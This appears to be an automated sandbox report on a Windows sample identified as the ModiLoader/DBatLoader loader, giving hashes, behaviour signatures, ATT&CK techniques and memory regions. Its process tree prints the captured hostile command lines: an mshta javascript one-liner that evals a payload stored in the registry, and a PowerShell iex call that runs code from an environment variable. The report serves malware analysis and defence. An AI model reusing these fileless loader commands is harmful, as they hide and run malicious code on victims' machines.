Analysis

  • max time kernel
    142s
  • max time network
    127s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-06-2024 17:26

General

  • Target

    929a3ecf9b2e6067650d796a02be3d2f_JaffaCakes118.exe

  • Size

    471KB

  • MD5

    929a3ecf9b2e6067650d796a02be3d2f

  • SHA1

    667e62fba674f62099d116d5d5c724c2f55b3652

  • SHA256

    9d20f3273d67668fcf59d481d680f4bd4581373c90d7c91b4854666365bcab03

  • SHA512

    54ed879d5b6418e890408e14c858f201cc49356c8b3acb4cf8e10f529b05c6c082af217dc50445f0bd2e63e6e1e8761fb1debcca2c23f8e704f63afe577169e2

  • SSDEEP

    12288:xixkSFttgCCqf1aqc+b1YAUI11TJUjzPH:4PfgCCEaq917UYSv

Score
10/10

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • ModiLoader Second Stage 9 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\929a3ecf9b2e6067650d796a02be3d2f_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\929a3ecf9b2e6067650d796a02be3d2f_JaffaCakes118.exe"
    1⤵
      PID:3160
    • C:\Windows\system32\mshta.exe
      "C:\Windows\system32\mshta.exe" javascript:aE8R2D="s4Jf02Q";X6f=new%20ActiveXObject("WScript.Shell");wL6V0U="NrKhCk";Nq0ib0=X6f.RegRead("HKCU\\software\\tx4Quy5bck\\DeVA5u95h");qs1JGOWj="fZef";eval(Nq0ib0);Cmf5iWW="8IRNQZ";
      1⤵
      • Process spawned unexpected child process
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:4820
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:chdji
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:552

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    2
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_w0i3xpyc.aaw.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/552-11-0x0000000005120000-0x0000000005156000-memory.dmp
      Filesize

      216KB

    • memory/552-15-0x0000000005FB0000-0x0000000006016000-memory.dmp
      Filesize

      408KB

    • memory/552-12-0x00000000058A0000-0x0000000005EC8000-memory.dmp
      Filesize

      6.2MB

    • memory/552-14-0x0000000005F40000-0x0000000005FA6000-memory.dmp
      Filesize

      408KB

    • memory/552-13-0x0000000005730000-0x0000000005752000-memory.dmp
      Filesize

      136KB

    • memory/552-29-0x0000000006980000-0x000000000699A000-memory.dmp
      Filesize

      104KB

    • memory/552-28-0x0000000007E10000-0x000000000848A000-memory.dmp
      Filesize

      6.5MB

    • memory/552-27-0x0000000006A80000-0x0000000006ACC000-memory.dmp
      Filesize

      304KB

    • memory/552-26-0x00000000064F0000-0x000000000650E000-memory.dmp
      Filesize

      120KB

    • memory/552-22-0x0000000006020000-0x0000000006374000-memory.dmp
      Filesize

      3.3MB

    • memory/3160-5-0x0000000002310000-0x00000000023EC000-memory.dmp
      Filesize

      880KB

    • memory/3160-4-0x0000000002310000-0x00000000023EC000-memory.dmp
      Filesize

      880KB

    • memory/3160-6-0x0000000002310000-0x00000000023EC000-memory.dmp
      Filesize

      880KB

    • memory/3160-7-0x0000000002310000-0x00000000023EC000-memory.dmp
      Filesize

      880KB

    • memory/3160-1-0x0000000000400000-0x000000000047F3BC-memory.dmp
      Filesize

      508KB

    • memory/3160-0-0x0000000000472000-0x0000000000474000-memory.dmp
      Filesize

      8KB

    • memory/3160-9-0x0000000002310000-0x00000000023EC000-memory.dmp
      Filesize

      880KB

    • memory/3160-8-0x0000000002310000-0x00000000023EC000-memory.dmp
      Filesize

      880KB

    • memory/3160-3-0x0000000000400000-0x000000000047F3BC-memory.dmp
      Filesize

      508KB

    • memory/3160-2-0x0000000002310000-0x00000000023EC000-memory.dmp
      Filesize

      880KB

    • memory/3160-35-0x0000000000472000-0x0000000000474000-memory.dmp
      Filesize

      8KB